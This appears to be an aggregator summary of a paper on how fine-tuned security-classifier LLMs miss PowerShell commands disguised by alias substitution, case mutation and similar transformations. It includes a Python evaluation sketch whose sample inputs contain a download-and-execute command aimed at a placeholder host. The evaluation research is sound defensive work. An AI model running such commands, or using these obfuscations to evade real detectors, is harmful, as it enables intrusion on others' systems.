Inherited Circuits, Learned Semantics: How Fine-Tuning Creates Evasion Vulnerabilities Invisible to Standard Evaluation

arXiv:2606.27091v1. Abstract: LLMs fine-tuned for security classification are usually evaluated on held-out examples from the same distribution as their training data. We show that this can miss vulnerabilities introduced by fine-tuning itself: models can learn token-level indicator semantics that preserve canonical accuracy while failing under behavior-preserving transformations such as PowerShell alias substitution, command reconstruction, string construction, execution indirection, and case mutation. We study Foundation-Sec-8B-Instruct and its base model, Llama-3.1-8B-In
The increasing deployment of LLMs in security-sensitive roles makes the robust evaluation of their vulnerabilities critical, especially as fine-tuning becomes a standard practice.
This research highlights a significant vulnerability class in fine-tuned LLMs for security, indicating that current evaluation methods are insufficient and could lead to deployed systems with hidden flaws.
Security evaluation of AI models will need to move beyond standard held-out testing on the training distribution and include behavior-preserving adversarial transformations that expose evasion vulnerabilities introduced by fine-tuning.
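To make the idea of transformation-based evaluation concrete, here is a minimal Python sketch. It is not the paper's method or code: `toy_classifier` is a hypothetical stand-in for a fine-tuned model that keys on a single canonical token, the alias table is a small illustrative subset of PowerShell's built-in aliases, and the sample commands are placeholders. It covers only two of the transformations named in the abstract (alias substitution and case mutation), and the case mutation is limited to cmdlet names so that case-sensitive arguments such as URL paths are left alone.

```python
import re
from typing import Callable, Dict, List

# Illustrative subset of built-in PowerShell aliases (cmdlet -> alias).
ALIASES: Dict[str, str] = {
    "Invoke-Expression": "iex",
    "Invoke-WebRequest": "iwr",
    "Get-ChildItem": "gci",
}


def alias_substitution(command: str) -> str:
    """Replace each known cmdlet name with its alias (case-insensitive match)."""
    for cmdlet, alias in ALIASES.items():
        command = re.sub(re.escape(cmdlet), alias, command, flags=re.IGNORECASE)
    return command


def case_mutation(command: str) -> str:
    """Alternate upper/lower case inside known cmdlet names only."""
    def alternate(match: "re.Match[str]") -> str:
        return "".join(
            ch.upper() if i % 2 == 0 else ch.lower()
            for i, ch in enumerate(match.group(0))
        )

    for cmdlet in ALIASES:
        command = re.sub(re.escape(cmdlet), alternate, command, flags=re.IGNORECASE)
    return command


def toy_classifier(command: str) -> bool:
    """Hypothetical model stand-in: flags only the exact canonical token."""
    return "Invoke-Expression" in command


def detection_rates(
    classifier: Callable[[str], bool],
    commands: List[str],
    transforms: Dict[str, Callable[[str], str]],
) -> Dict[str, float]:
    """Fraction of commands flagged, on canonical and on transformed inputs."""
    rates = {"canonical": sum(classifier(c) for c in commands) / len(commands)}
    for name, transform in transforms.items():
        flagged = sum(classifier(transform(c)) for c in commands)
        rates[name] = flagged / len(commands)
    return rates


# Placeholder inputs; every command here should be flagged by a robust classifier.
SAMPLES = [
    "Invoke-Expression $script",
    "Invoke-Expression (Invoke-WebRequest https://example.test/a.ps1).Content",
]

TRANSFORMS = {
    "alias_substitution": alias_substitution,
    "case_mutation": case_mutation,
}

if __name__ == "__main__":
    for name, rate in detection_rates(toy_classifier, SAMPLES, TRANSFORMS).items():
        print(f"{name}: {rate:.2f}")
```

In this toy setup the classifier flags every canonical sample and none of the transformed ones, which is the kind of gap a held-out test set drawn from the training distribution would not show. A real harness would swap `toy_classifier` for the model under test and would need to verify separately that each transformation actually preserves behavior.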
- Adversarial AI researchers
- Cybersecurity firms specializing in AI red-teaming
- Developers of robust AI security evaluation tools
- Organizations relying on LLMs for security without advanced testing
- Developers of AI security classification models without robust validation
- Traditional AI model evaluation methods
Security-focused LLMs will require more sophisticated and adversarial fine-tuning and evaluation techniques to prevent subtle evasion vulnerabilities.
This could lead to a 'security arms race' in AI, in which evaluation methods must continually probe for new evasion techniques that fine-tuned models fail to handle.
The increased cost and complexity of securing AI models may slow their deployment in critical infrastructure or highly sensitive data environments, or necessitate new regulatory standards.
Read at arXiv cs.AI